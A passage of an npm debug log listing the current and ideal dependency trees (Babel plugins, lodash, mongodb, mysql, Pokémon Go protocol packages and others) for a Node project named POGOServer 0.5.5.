babel-helper-call-delegate@6.8.0\r\n118 silly currentTree +-- babel-helper-define-map@6.9.0\r\n118 silly currentTree +-- babel-helper-explode-assignable-expression@6.8.0\r\n118 silly currentTree +-- babel-helper-explode-class@6.8.0\r\n118 silly currentTree +-- babel-helper-function-name@6.8.0\r\n118 silly currentTree +-- babel-helper-get-function-arity@6.8.0\r\n118 silly currentTree +-- babel-helper-hoist-variables@6.8.0\r\n118 silly currentTree +-- babel-helper-optimise-call-expression@6.8.0\r\n118 silly currentTree +-- babel-helper-regex@6.9.0\r\n118 silly currentTree +-- babel-helper-remap-async-to-generator@6.11.2\r\n118 silly currentTree +-- babel-helper-replace-supers@6.14.0\r\n118 silly currentTree +-- babel-helpers@6.8.0\r\n118 silly currentTree +-- babel-messages@6.8.0\r\n118 silly currentTree +-- babel-plugin-check-es2015-constants@6.8.0\r\n118 silly currentTree +-- babel-plugin-syntax-async-functions@6.13.0\r\n118 silly currentTree +-- babel-plugin-syntax-class-constructor-call@6.13.0\r\n118 silly currentTree +-- babel-plugin-syntax-class-properties@6.13.0\r\n118 silly currentTree +-- babel-plugin-syntax-decorators@6.13.0\r\n118 silly currentTree +-- babel-plugin-syntax-do-expressions@6.13.0\r\n118 silly currentTree +-- babel-plugin-syntax-exponentiation-operator@6.13.0\r\n118 silly currentTree +-- babel-plugin-syntax-export-extensions@6.13.0\r\n118 silly currentTree +-- babel-plugin-syntax-function-bind@6.13.0\r\n118 silly currentTree +-- babel-plugin-syntax-object-rest-spread@6.13.0\r\n118 silly currentTree +-- babel-plugin-syntax-trailing-function-commas@6.13.0\r\n118 silly currentTree +-- babel-plugin-transform-async-to-generator@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-class-constructor-call@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-class-properties@6.11.5\r\n118 silly currentTree +-- babel-plugin-transform-decorators@6.13.0\r\n118 silly currentTree +-- babel-plugin-transform-do-expressions@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-arrow-functions@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-block-scoped-functions@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-block-scoping@6.14.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-classes@6.14.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-computed-properties@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-destructuring@6.9.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-duplicate-keys@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-for-of@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-function-name@6.9.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-literals@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-modules-amd@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-modules-commonjs@6.14.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-modules-systemjs@6.14.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-modules-umd@6.12.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-object-super@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-parameters@6.11.4\r\n118 silly currentTree +-- babel-plugin-transform-es2015-shorthand-properties@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-spread@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-sticky-regex@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-template-literals@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-typeof-symbol@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-es2015-unicode-regex@6.11.0\r\n118 silly currentTree +-- babel-plugin-transform-exponentiation-operator@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-export-extensions@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-function-bind@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-object-rest-spread@6.8.0\r\n118 silly currentTree +-- babel-plugin-transform-regenerator@6.14.0\r\n118 silly currentTree +-- babel-plugin-transform-strict-mode@6.11.3\r\n118 silly currentTree +-- babel-polyfill@6.13.0\r\n118 silly currentTree +-- babel-preset-es2015@6.14.0\r\n118 silly currentTree +-- babel-preset-stage-0@6.5.0\r\n118 silly currentTree +-- babel-preset-stage-1@6.13.0\r\n118 silly currentTree +-- babel-preset-stage-2@6.13.0\r\n118 silly currentTree +-- babel-preset-stage-3@6.11.0\r\n118 silly currentTree +-- babel-register@6.14.0\r\n118 silly currentTree +-- babel-runtime@6.11.6\r\n118 silly currentTree +-- babel-template@6.14.0\r\n118 silly currentTree +-- babel-traverse@6.14.0\r\n118 silly currentTree +-- babel-types@6.14.0\r\n118 silly currentTree +-- babylon@6.9.1\r\n118 silly currentTree +-- balanced-match@0.4.2\r\n118 silly currentTree +-- bignumber.js@2.3.0\r\n118 silly currentTree +-- bin-version-check@2.1.0\r\n118 silly currentTree +-- bin-version@1.0.4\r\n118 silly currentTree +-- binary-extensions@1.5.0\r\n118 silly currentTree +-- bindings@1.2.1\r\n118 silly currentTree +-- bl@1.1.2\r\n118 silly currentTree | `-- readable-stream@2.0.6\r\n118 silly currentTree +-- block-stream@0.0.9\r\n118 silly currentTree +-- bluebird-retry@0.8.0\r\n118 silly currentTree +-- bluebird@3.4.3\r\n118 silly currentTree +-- boom@2.10.1\r\n118 silly currentTree +-- brace-expansion@1.1.6\r\n118 silly currentTree +-- braces@1.8.5\r\n118 silly currentTree +-- bson@0.5.4\r\n118 silly currentTree +-- buffer-shims@1.0.0\r\n118 silly currentTree +-- builtin-modules@1.1.1\r\n118 silly currentTree +-- bytebuffer@5.0.1\r\n118 silly currentTree +-- camelcase-keys@2.1.0\r\n118 silly currentTree +-- camelcase@2.1.1\r\n118 silly currentTree +-- caseless@0.11.0\r\n118 silly currentTree +-- chalk@1.1.1\r\n118 silly currentTree +-- chokidar@1.6.0\r\n118 silly currentTree +-- cliui@3.2.0\r\n118 silly currentTree +-- code-point-at@1.0.0\r\n118 silly currentTree +-- colour@0.7.1\r\n118 silly currentTree +-- combined-stream@1.0.5\r\n118 silly currentTree +-- commander@2.9.0\r\n118 silly currentTree +-- concat-map@0.0.1\r\n118 silly currentTree +-- configstore@1.4.0\r\n118 silly currentTree +-- console-control-strings@1.1.0\r\n118 silly currentTree +-- convert-source-map@1.3.0\r\n118 silly currentTree +-- core-js@2.4.1\r\n118 silly currentTree +-- core-util-is@1.0.2\r\n118 silly currentTree +-- cryptiles@2.0.5\r\n118 silly currentTree +-- crypto-js@3.1.6\r\n118 silly currentTree +-- cuint@0.2.2\r\n118 silly currentTree +-- currently-unhandled@0.4.1\r\n118 silly currentTree +-- d@0.1.1\r\n118 silly currentTree +-- dashdash@1.14.0\r\n118 silly currentTree | `-- assert-plus@1.0.0\r\n118 silly currentTree +-- debug@2.2.0\r\n118 silly currentTree +-- decamelize@1.2.0\r\n118 silly currentTree +-- deep-extend@0.4.1\r\n118 silly currentTree +-- delayed-stream@1.0.0\r\n118 silly currentTree +-- delegates@1.0.0\r\n118 silly currentTree +-- detect-indent@3.0.1\r\n118 silly currentTree +-- directory-tree@1.1.0\r\n118 silly currentTree +-- duplexer@0.1.1\r\n118 silly currentTree +-- duplexify@3.4.5\r\n118 silly currentTree +-- ecc-jsbn@0.1.1\r\n118 silly currentTree +-- end-of-stream@1.0.0\r\n118 silly currentTree +-- error-ex@1.3.0\r\n118 silly currentTree +-- es5-ext@0.10.12\r\n118 silly currentTree +-- es6-iterator@2.0.0\r\n118 silly currentTree +-- es6-promise@3.2.1\r\n118 silly currentTree +-- es6-symbol@3.1.0\r\n118 silly currentTree +-- escape-string-regexp@1.0.5\r\n118 silly currentTree +-- esutils@2.0.2\r\n118 silly currentTree +-- event-stream@3.3.4\r\n118 silly currentTree +-- expand-brackets@0.1.5\r\n118 silly currentTree +-- expand-range@1.8.2\r\n118 silly currentTree +-- extend@3.0.0\r\n118 silly currentTree +-- extglob@0.3.2\r\n118 silly currentTree +-- extsprintf@1.0.2\r\n118 silly currentTree +-- filename-regex@2.0.0\r\n118 silly currentTree +-- fill-range@2.2.3\r\n118 silly currentTree +-- find-up@1.1.2\r\n118 silly currentTree | `-- path-exists@2.1.0\r\n118 silly currentTree +-- find-versions@1.2.1\r\n118 silly currentTree +-- for-in@0.1.5\r\n118 silly currentTree +-- for-own@0.1.4\r\n118 silly currentTree +-- forever-agent@0.6.1\r\n118 silly currentTree +-- form-data@1.0.0-rc4\r\n118 silly currentTree +-- from@0.1.3\r\n118 silly currentTree +-- fs-extra@0.30.0\r\n118 silly currentTree +-- fs-readdir-recursive@0.1.2\r\n118 silly currentTree +-- fs.realpath@1.0.0\r\n118 silly currentTree +-- fstream-ignore@1.0.5\r\n118 silly currentTree +-- fstream@1.0.10\r\n118 silly currentTree +-- gauge@2.6.0\r\n118 silly currentTree +-- generate-function@2.0.0\r\n118 silly currentTree +-- generate-object-property@1.2.0\r\n118 silly currentTree +-- get-stdin@4.0.1\r\n118 silly currentTree +-- getpass@0.1.6\r\n118 silly currentTree | `-- assert-plus@1.0.0\r\n118 silly currentTree +-- glob-base@0.3.0\r\n118 silly currentTree +-- glob-parent@2.0.0\r\n118 silly currentTree +-- glob@5.0.15\r\n118 silly currentTree +-- globals@8.18.0\r\n118 silly currentTree +-- got@3.3.1\r\n118 silly currentTree | `-- object-assign@3.0.0\r\n118 silly currentTree +-- gpsoauthnode@0.0.5\r\n118 silly currentTree +-- graceful-fs@4.1.6\r\n118 silly currentTree +-- graceful-readlink@1.0.1\r\n118 silly currentTree +-- har-validator@2.0.6\r\n118 silly currentTree +-- has-ansi@2.0.0\r\n118 silly currentTree +-- has-color@0.1.7\r\n118 silly currentTree +-- has-unicode@2.0.1\r\n118 silly currentTree +-- hawk@3.1.3\r\n118 silly currentTree +-- hoek@2.16.3\r\n118 silly currentTree +-- home-or-tmp@1.0.0\r\n118 silly currentTree +-- hosted-git-info@2.1.5\r\n118 silly currentTree +-- http-signature@1.1.1\r\n118 silly currentTree +-- ignore-by-default@1.0.1\r\n118 silly currentTree +-- imurmurhash@0.1.4\r\n118 silly currentTree +-- indent-string@2.1.0\r\n118 silly currentTree | `-- repeating@2.0.1\r\n118 silly currentTree +-- infinity-agent@2.0.3\r\n118 silly currentTree +-- inflight@1.0.5\r\n118 silly currentTree +-- inherits@2.0.1\r\n118 silly currentTree +-- ini@1.3.4\r\n118 silly currentTree +-- invariant@2.2.1\r\n118 silly currentTree +-- invert-kv@1.0.0\r\n118 silly currentTree +-- is-arrayish@0.2.1\r\n118 silly currentTree +-- is-binary-path@1.0.1\r\n118 silly currentTree +-- is-buffer@1.1.4\r\n118 silly currentTree +-- is-builtin-module@1.0.0\r\n118 silly currentTree +-- is-dotfile@1.0.2\r\n118 silly currentTree +-- is-equal-shallow@0.1.3\r\n118 silly currentTree +-- is-extendable@0.1.1\r\n118 silly currentTree +-- is-extglob@1.0.0\r\n118 silly currentTree +-- is-finite@1.0.1\r\n118 silly currentTree +-- is-fullwidth-code-point@1.0.0\r\n118 silly currentTree +-- is-glob@2.0.1\r\n118 silly currentTree +-- is-my-json-valid@2.13.1\r\n118 silly currentTree +-- is-npm@1.0.0\r\n118 silly currentTree +-- is-number@2.1.0\r\n118 silly currentTree +-- is-posix-bracket@0.1.1\r\n118 silly currentTree +-- is-primitive@2.0.0\r\n118 silly currentTree +-- is-property@1.0.2\r\n118 silly currentTree +-- is-redirect@1.0.0\r\n118 silly currentTree +-- is-stream@1.1.0\r\n118 silly currentTree +-- is-typedarray@1.0.0\r\n118 silly currentTree +-- is-utf8@0.2.1\r\n118 silly currentTree +-- isarray@1.0.0\r\n118 silly currentTree +-- isexe@1.1.2\r\n118 silly currentTree +-- isobject@2.1.0\r\n118 silly currentTree +-- isstream@0.1.2\r\n118 silly currentTree +-- jodid25519@1.0.2\r\n118 silly currentTree +-- js-tokens@2.0.0\r\n118 silly currentTree +-- jsbn@0.1.0\r\n118 silly currentTree +-- jsesc@0.5.0\r\n118 silly currentTree +-- json-schema@0.2.2\r\n118 silly currentTree +-- json-stringify-safe@5.0.1\r\n118 silly currentTree +-- json5@0.4.0\r\n118 silly currentTree +-- jsonfile@2.3.1\r\n118 silly currentTree +-- jsonpointer@2.0.0\r\n118 silly currentTree +-- jsprim@1.3.0\r\n118 silly currentTree +-- jwt-decode@2.1.0\r\n118 silly currentTree +-- kind-of@3.0.4\r\n118 silly currentTree +-- klaw@1.3.0\r\n118 silly currentTree +-- latest-version@1.0.1\r\n118 silly currentTree +-- lcid@1.0.0\r\n118 silly currentTree +-- load-json-file@1.1.0\r\n118 silly currentTree +-- lodash._baseassign@3.2.0\r\n118 silly currentTree +-- lodash._basecopy@3.0.1\r\n118 silly currentTree +-- lodash._bindcallback@3.0.1\r\n118 silly currentTree +-- lodash._createassigner@3.1.1\r\n118 silly currentTree +-- lodash._getnative@3.9.1\r\n118 silly currentTree +-- lodash._isiterateecall@3.0.9\r\n118 silly currentTree +-- lodash.assign@3.2.0\r\n118 silly currentTree +-- lodash.defaults@3.1.2\r\n118 silly currentTree +-- lodash.isarguments@3.1.0\r\n118 silly currentTree +-- lodash.isarray@3.0.4\r\n118 silly currentTree +-- lodash.keys@3.1.2\r\n118 silly currentTree +-- lodash.restparam@3.6.1\r\n118 silly currentTree +-- lodash@4.15.0\r\n118 silly currentTree +-- log-symbols@1.0.2\r\n118 silly currentTree +-- long@3.2.0\r\n118 silly currentTree +-- loose-envify@1.2.0\r\n118 silly currentTree | `-- js-tokens@1.0.3\r\n118 silly currentTree +-- loud-rejection@1.6.0\r\n118 silly currentTree +-- lowercase-keys@1.0.0\r\n118 silly currentTree +-- map-obj@1.0.1\r\n118 silly currentTree +-- map-stream@0.1.0\r\n118 silly currentTree +-- meow@3.7.0\r\n118 silly currentTree +-- micromatch@2.3.11\r\n118 silly currentTree +-- mime-db@1.23.0\r\n118 silly currentTree +-- mime-types@2.1.11\r\n118 silly currentTree +-- minimatch@3.0.3\r\n118 silly currentTree +-- minimist@1.2.0\r\n118 silly currentTree +-- mkdirp@0.5.1\r\n118 silly currentTree | `-- minimist@0.0.8\r\n118 silly currentTree +-- mongodb-core@2.0.10\r\n118 silly currentTree +-- mongodb@2.2.8\r\n118 silly currentTree +-- ms@0.7.1\r\n118 silly currentTree +-- mysql@2.11.1\r\n118 silly currentTree | +-- isarray@0.0.1\r\n118 silly currentTree | `-- readable-stream@1.1.14\r\n118 silly currentTree +-- nan@2.4.0\r\n118 silly currentTree +-- nested-error-stacks@1.0.2\r\n118 silly currentTree +-- node-gyp@3.4.0\r\n118 silly currentTree | `-- glob@7.0.6\r\n118 silly currentTree +-- node-pogo-protos@1.4.0\r\n118 silly currentTree +-- node-pogo-signature@2.0.2\r\n118 silly currentTree +-- node-pre-gyp@0.6.29\r\n118 silly currentTree | `-- semver@5.2.0\r\n118 silly currentTree +-- node-protobuf@1.3.0\r\n118 silly currentTree +-- node-uuid@1.4.7\r\n118 silly currentTree +-- nodegit-promise@4.0.0\r\n118 silly currentTree +-- nodegit@0.14.1\r\n118 silly currentTree | `-- fs-extra@0.26.7\r\n118 silly currentTree +-- nodemon@1.10.2\r\n118 silly currentTree +-- nopt@3.0.6\r\n118 silly currentTree +-- normalize-package-data@2.3.5\r\n118 silly currentTree +-- normalize-path@2.0.1\r\n118 silly currentTree +-- npmlog@3.1.2\r\n118 silly currentTree +-- number-is-nan@1.0.0\r\n118 silly currentTree +-- oauth-sign@0.8.2\r\n118 silly currentTree +-- object-assign@4.1.0\r\n118 silly currentTree +-- object.omit@2.0.0\r\n118 silly currentTree +-- once@1.3.3\r\n118 silly currentTree +-- optjs@3.2.2\r\n118 silly currentTree +-- os-homedir@1.0.1\r\n118 silly currentTree +-- os-locale@1.4.0\r\n118 silly currentTree +-- os-tmpdir@1.0.1\r\n118 silly currentTree +-- osenv@0.1.3\r\n118 silly currentTree +-- output-file-sync@1.1.2\r\n118 silly currentTree +-- package-json@1.2.0\r\n118 silly currentTree +-- parse-glob@3.0.4\r\n118 silly currentTree +-- parse-json@2.2.0\r\n118 silly currentTree +-- path-array@1.0.1\r\n118 silly currentTree +-- path-exists@1.0.0\r\n118 silly currentTree +-- path-is-absolute@1.0.0\r\n118 silly currentTree +-- path-type@1.1.0\r\n118 silly currentTree +-- path@0.12.7\r\n118 silly currentTree +-- pause-stream@0.0.11\r\n118 silly currentTree +-- pcrypt@1.0.0\r\n118 silly currentTree +-- pify@2.3.0\r\n118 silly currentTree +-- pinkie-promise@2.0.1\r\n118 silly currentTree +-- pinkie@2.0.4\r\n118 silly currentTree +-- pogo-asset-downloader@0.3.1\r\n118 silly currentTree +-- pogobuf@1.6.0\r\n118 silly currentTree +-- pokemongo-protobuf@1.11.0\r\n118 silly currentTree +-- pokename@0.3.0\r\n118 silly currentTree +-- prepend-http@1.0.4\r\n118 silly currentTree +-- preserve@0.2.0\r\n118 silly currentTree +-- private@0.1.6\r\n118 silly currentTree +-- process-nextick-args@1.0.7\r\n118 silly currentTree +-- process@0.11.8\r\n118 silly currentTree +-- promisify-node@0.3.0\r\n118 silly currentTree +-- protobufjs@5.0.1\r\n118 silly currentTree +-- ps-tree@1.1.0\r\n118 silly currentTree +-- qs@6.2.1\r\n118 silly currentTree +-- randomatic@1.1.5\r\n118 silly currentTree +-- rc@1.1.6\r\n118 silly currentTree +-- read-all-stream@3.1.0\r\n118 silly currentTree +-- read-pkg-up@1.0.1\r\n118 silly currentTree +-- read-pkg@1.1.0\r\n118 silly currentTree +-- readable-stream@2.1.5\r\n118 silly currentTree +-- readdirp@2.1.0\r\n118 silly currentTree +-- redent@1.0.0\r\n118 silly currentTree +-- regenerate@1.3.1\r\n118 silly currentTree +-- regenerator-runtime@0.9.5\r\n118 silly currentTree +-- regex-cache@0.4.3\r\n118 silly currentTree +-- regexpu-core@2.0.0\r\n118 silly currentTree +-- registry-url@3.1.0\r\n118 silly currentTree +-- regjsgen@0.2.0\r\n118 silly currentTree +-- regjsparser@0.1.5\r\n118 silly currentTree +-- repeat-element@1.1.2\r\n118 silly currentTree +-- repeat-string@1.5.4\r\n118 silly currentTree +-- repeating@1.1.3\r\n118 silly currentTree +-- request@2.74.0\r\n118 silly currentTree +-- require_optional@1.0.0\r\n118 silly currentTree | `-- semver@5.3.0\r\n118 silly currentTree +-- resolve-from@2.0.0\r\n118 silly currentTree +-- rimraf@2.5.4\r\n118 silly currentTree | `-- glob@7.0.6\r\n118 silly currentTree +-- s2-geometry@1.2.9\r\n118 silly currentTree +-- semver-diff@2.1.0\r\n118 silly currentTree | `-- semver@5.3.0\r\n118 silly currentTree +-- semver-regex@1.0.0\r\n118 silly currentTree +-- semver-truncate@1.1.2\r\n118 silly currentTree | `-- semver@5.3.0\r\n118 silly currentTree +-- semver@4.3.6\r\n118 silly currentTree +-- set-blocking@2.0.0\r\n118 silly currentTree +-- set-immediate-shim@1.0.1\r\n118 silly currentTree +-- shebang-regex@1.0.0\r\n118 silly currentTree +-- signal-exit@3.0.0\r\n118 silly currentTree +-- slash@1.0.0\r\n118 silly currentTree +-- slide@1.1.6\r\n118 silly currentTree +-- sntp@1.0.9\r\n118 silly currentTree +-- source-map-support@0.2.10\r\n118 silly currentTree | `-- source-map@0.1.32\r\n118 silly currentTree +-- source-map@0.5.6\r\n118 silly currentTree +-- spdx-correct@1.0.2\r\n118 silly currentTree +-- spdx-exceptions@1.0.5\r\n118 silly currentTree +-- spdx-expression-parse@1.0.2\r\n118 silly currentTree +-- spdx-license-ids@1.2.2\r\n118 silly currentTree +-- split@0.3.3\r\n118 silly currentTree +-- sqlstring@2.0.1\r\n118 silly currentTree +-- sshpk@1.9.2\r\n118 silly currentTree | `-- assert-plus@1.0.0\r\n118 silly currentTree +-- stream-combiner@0.0.4\r\n118 silly currentTree +-- stream-shift@1.0.0\r\n118 silly currentTree +-- string_decoder@0.10.31\r\n118 silly currentTree +-- string-length@1.0.1\r\n118 silly currentTree +-- string-width@1.0.2\r\n118 silly currentTree +-- stringstream@0.0.5\r\n118 silly currentTree +-- strip-ansi@3.0.1\r\n118 silly currentTree +-- strip-bom@2.0.0\r\n118 silly currentTree +-- strip-indent@1.0.1\r\n118 silly currentTree +-- strip-json-comments@1.0.4\r\n118 silly currentTree +-- supports-color@2.0.0\r\n118 silly currentTree +-- tar-pack@3.1.4\r\n118 silly currentTree +-- tar@2.2.1\r\n118 silly currentTree +-- through@2.3.8\r\n118 silly currentTree +-- timed-out@2.0.0\r\n118 silly currentTree +-- to-fast-properties@1.0.2\r\n118 silly currentTree +-- touch@1.0.0\r\n118 silly currentTree | `-- nopt@1.0.10\r\n118 silly currentTree +-- tough-cookie@2.3.1\r\n118 silly currentTree +-- trim-newlines@1.0.0\r\n118 silly currentTree +-- tunnel-agent@0.4.3\r\n118 silly currentTree +-- tweetnacl@0.13.3\r\n118 silly currentTree +-- uid-number@0.0.6\r\n118 silly currentTree +-- undefsafe@0.0.3\r\n118 silly currentTree +-- update-notifier@0.5.0\r\n118 silly currentTree +-- user-home@1.1.1\r\n118 silly currentTree +-- util-deprecate@1.0.2\r\n118 silly currentTree +-- util@0.10.3\r\n118 silly currentTree +-- uuid@2.0.2\r\n118 silly currentTree +-- v8flags@2.0.11\r\n118 silly currentTree +-- validate-npm-package-license@3.0.1\r\n118 silly currentTree +-- verror@1.3.6\r\n118 silly currentTree +-- which@1.2.10\r\n118 silly currentTree +-- wide-align@1.1.0\r\n118 silly currentTree +-- window-size@0.1.4\r\n118 silly currentTree +-- wrap-ansi@2.0.0\r\n118 silly currentTree +-- wrappy@1.0.2\r\n118 silly currentTree +-- write-file-atomic@1.2.0\r\n118 silly currentTree +-- xdg-basedir@2.0.0\r\n118 silly currentTree +-- xtend@4.0.1\r\n118 silly currentTree +-- xxhashjs@0.2.1\r\n118 silly currentTree +-- y18n@3.2.1\r\n118 silly currentTree `-- yargs@3.32.0\r\n119 silly idealTree POGOServer@0.5.5\r\n119 silly idealTree +-- abbrev@1.0.9\r\n119 silly idealTree +-- amdefine@1.0.0\r\n119 silly idealTree +-- ansi-regex@2.0.0\r\n119 silly idealTree +-- ansi-styles@2.2.1\r\n119 silly idealTree +-- anymatch@1.3.0\r\n119 silly idealTree +-- aproba@1.0.4\r\n119 silly idealTree +-- are-we-there-yet@1.1.2\r\n119 silly idealTree +-- arr-diff@2.0.0\r\n119 silly idealTree +-- arr-flatten@1.0.1\r\n119 silly idealTree +-- array-find-index@1.0.1\r\n119 silly idealTree +-- array-index@1.0.0\r\n119 silly idealTree +-- array-uniq@1.0.3\r\n119 silly idealTree +-- array-unique@0.2.1\r\n119 silly idealTree +-- arrify@1.0.1\r\n119 silly idealTree +-- asap@2.0.4\r\n119 silly idealTree +-- ascli@1.0.0\r\n119 silly idealTree +-- asn1@0.2.3\r\n119 silly idealTree +-- assert-plus@0.2.0\r\n119 silly idealTree +-- async-each@1.0.1\r\n119 silly idealTree +-- async@1.5.2\r\n119 silly idealTree +-- aws-sign2@0.6.0\r\n119 silly idealTree +-- aws4@1.4.1\r\n119 silly idealTree +-- babel-cli@6.14.0\r\n119 silly idealTree +-- babel-code-frame@6.11.0\r\n119 silly idealTree +-- babel-core@6.14.0\r\n119 silly idealTree +-- babel-generator@6.14.0\r\n119 silly idealTree +-- babel-helper-bindify-decorators@6.8.0\r\n119 silly idealTree +-- babel-helper-builder-binary-assignment-operator-visitor@6.8.0\r\n119 silly idealTree +-- babel-helper-call-delegate@6.8.0\r\n119 silly idealTree +-- babel-helper-define-map@6.9.0\r\n119 silly idealTree +-- babel-helper-explode-assignable-expression@6.8.0\r\n119 silly idealTree +-- babel-helper-explode-class@6.8.0\r\n119 silly idealTree +-- babel-helper-function-name@6.8.0\r\n119 silly idealTree +-- babel-helper-get-function-arity@6.8.0\r\n119 silly idealTree +-- babel-helper-hoist-variables@6.8.0\r\n119 silly idealTree +-- babel-helper-optimise-call-expression@6.8.0\r\n119 silly idealTree +-- babel-helper-regex@6.9.0\r\n119 silly idealTree +-- babel-helper-remap-async-to-generator@6.11.2\r\n119 silly idealTree +-- babel-helper-replace-supers@6.14.0\r\n119 silly idealTree +-- babel-helpers@6.8.0\r\n119 silly idealTree +-- babel-messages@6.8.0\r\n119 silly idealTree +-- babel-plugin-check-es2015-constants@6.8.0\r\n119 silly idealTree +-- babel-plugin-syntax-async-functions@6.13.0\r\n119 silly idealTree +-- babel-plugin-syntax-class-constructor-call@6.13.0\r\n119 silly idealTree +-- babel-plugin-syntax-class-properties@6.13.0\r\n119 silly idealTree +-- babel-plugin-syntax-decorators@6.13.0\r\n119 silly idealTree +-- babel-plugin-syntax-do-expressions@6.13.0\r\n119 silly idealTree +-- babel-plugin-syntax-exponentiation-operator@6.13.0\r\n119 silly idealTree +-- babel-plugin-syntax-export-extensions@6.13.0\r\n119 silly idealTree +-- babel-plugin-syntax-function-bind@6.13.0\r\n119 silly idealTree +-- babel-plugin-syntax-object-rest-spread@6.13.0\r\n119 silly idealTree +-- babel-plugin-syntax-trailing-function-commas@6.13.0\r\n119 silly idealTree +-- babel-plugin-transform-async-to-generator@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-class-constructor-call@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-class-properties@6.11.5\r\n119 silly idealTree +-- babel-plugin-transform-decorators@6.13.0\r\n119 silly idealTree +-- babel-plugin-transform-do-expressions@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-arrow-functions@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-block-scoped-functions@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-block-scoping@6.14.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-classes@6.14.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-computed-properties@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-destructuring@6.9.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-duplicate-keys@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-for-of@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-function-name@6.9.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-literals@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-modules-amd@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-modules-commonjs@6.14.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-modules-systemjs@6.14.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-modules-umd@6.12.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-object-super@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-parameters@6.11.4\r\n119 silly idealTree +-- babel-plugin-transform-es2015-shorthand-properties@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-spread@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-sticky-regex@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-template-literals@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-typeof-symbol@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-es2015-unicode-regex@6.11.0\r\n119 silly idealTree +-- babel-plugin-transform-exponentiation-operator@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-export-extensions@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-function-bind@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-object-rest-spread@6.8.0\r\n119 silly idealTree +-- babel-plugin-transform-regenerator@6.14.0\r\n119 silly idealTree +-- babel-plugin-transform-strict-mode@6.11.3\r\n119 silly idealTree +-- babel-polyfill@6.13.0\r\n119 silly idealTree +-- babel-preset-es2015@6.14.0\r\n119 silly idealTree +-- babel-preset-stage-0@6.5.0\r\n119 silly idealTree +-- babel-preset-stage-1@6.13.0\r\n119 silly idealTree +-- babel-preset-stage-2@6.13.0\r\n119 silly idealTree +-- babel-preset-stage-3@6.11.0\r\n119 silly idealTree +-- babel-register@6.14.0\r\n119 silly idealTree +-- babel-runtime@6.11.6\r\n119 silly idealTree +-- babel-template@6.14.0\r\n119 silly idealTree +-- babel-traverse@6.14.0\r\n119 silly idealTree +-- babel-types@6.14.0\r\n119 silly idealTree +-- babylon@6.9.1\r\n119 silly idealTree +-- balanced-match@0.4.2\r\n119 silly idealTree +-- bignumber.js@2.3.0\r\n119 silly idealTree +-- bin-version-check@2.1.0\r\n119 silly idealTree +-- bin-version@1.0.4\r\n119 silly idealTree +-- binary-extensions@1.5.0\r\n119 silly idealTree +-- bindings@1.2.1\r\n119 silly idealTree +-- bl@1.1.2\r\n119 silly idealTree | `-- readable-stream@2.0.6\r\n119 silly idealTree +-- block-stream@0.0.9\r\n119 silly idealTree +-- bluebird-retry@0.8.0\r\n119 silly idealTree +-- bluebird@3.4.3\r\n119 silly idealTree +-- boom@2.10.1\r\n119 silly idealTree +-- brace-expansion@1.1.6\r\n119 silly idealTree +-- braces@1.8.5\r\n119 silly idealTree +-- bson@0.5.4\r\n119 silly idealTree +-- buffer-shims@1.0.0\r\n119 silly idealTree +-- builtin-modules@1.1.1\r\n119 silly idealTree +-- bytebuffer@5.0.1\r\n119 silly idealTree +-- camelcase-keys@2.1.0\r\n119 silly idealTree +-- camelcase@2.1.1\r\n119 silly idealTree +-- caseless@0.11.0\r\n119 silly idealTree +-- chalk@1.1.1\r\n119 silly idealTree +-- chokidar@1.6.0\r\n119 silly idealTree +-- cliui@3.2.0\r\n119 silly idealTree +-- code-point-at@1.0.0\r\n119 silly idealTree +-- colour@0.7.1\r\n119 silly idealTree +-- combined-stream@1.0.5\r\n119 silly idealTree +-- commander@2.9.0\r\n119 silly idealTree +-- 